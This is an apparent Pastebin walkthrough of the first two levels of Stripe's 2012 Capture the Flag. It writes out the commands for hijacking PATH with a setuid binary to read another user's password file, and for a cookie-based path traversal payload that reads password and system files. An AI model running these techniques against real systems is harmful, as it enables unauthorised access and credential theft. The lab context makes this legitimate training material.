API tools faq
paste
Advertisement
Guest User

Stripe's Capture the Flag Solutions

a guest
Feb 23rd, 2012
3,735
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.20 KB | None | 0 0
raw download clone embed print report
  1. Stripe "Capture the Flag" - SOLUTIONS
  2.  
  3. Solution for the first two levels.
  4.  
  5. Disclaimer: if you need to read this to solve either of the first two levels, you obviously do not have enough skills to solve many, if any, of the future levels. And you're definitely not going to be the first one to capture the final flag.
  6.  
  7. If you enjoy a challenge, stop reading now ... !
  8.  
  9. ...
  10.  
  11. still here?
  12.  
  13. ...
  14.  
  15. okay, let's roll ...
  16.  
  17.  
  18. Level 01
  19.  
  20. This level exploits a suid vulnerability. If you look at the source provided, you'll see the C code is making a "date" system call. The script we're going to execute runs as level02. We need to somehow get the script to output level02's password.
  21.  
  22. Let's create our own "date" executable, then change the PATH variable so that it gets called first, before the system "date" executable.
  23.  
  24. > ssh level01@ctf.stri.pe
  25. ( enter provided password)
  26.  
  27. > mkdir /tmp/pwn-level-one-1234rand
  28. > cd /tmp/pwn-level-one-1234rand
  29. > vi date
  30.  
  31. Set contents of date to:
  32. cat /home/level02/.password
  33.  
  34. > chmod +x date
  35. > PATH=/tmp/pwn-level-one-1234rand:$PATH;
  36. > export PATH
  37.  
  38. Now we run the script that's setuid as level02:
  39. > /levels/level01
  40.  
  41. It should output Level 2's password! If not, you did something wrong.
  42.  
  43. Level 2
  44.  
  45. This one's even easier than the first one, if you're familiar with PHP & cookies. NOM NOM NOM
  46.  
  47. Login as the level02 user using the password you obtained from the level01 sploit.
  48.  
  49. Visit:
  50.  
  51. http://ctf.stri.pe/level02.php
  52.  
  53. Enter the level02 credentials.
  54.  
  55. Back in ssh:
  56.  
  57. > cat /var/www/level02.php
  58.  
  59. Notice this line:
  60.  
  61. $out = file_get_contents('/tmp/level02/'.$_COOKIE['user_details']);
  62.  
  63. It gets executed if the cookie is already set.
  64.  
  65. See the problem here?
  66.  
  67. Cookies are stored client-side, so they can be fussed with. What if we changed the cookie to, oh, say ... "=../../etc/passwd" ?
  68.  
  69. Note: you need the leading "=" for the cookie to be formatted properly.
  70.  
  71. Using your favorite Cookie Editor (Chrome, Firefox, whatever), set the "user_details" cookie to:
  72. =../../home/level03/.password
  73.  
  74.  
  75. And re-submit the form. You should have your Level 3 password by now.
  76.  
  77.  
  78. Aaaand that's all, folks.
  79.  
  80. I'll leave the higher levels sploits to the real hackers out there.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!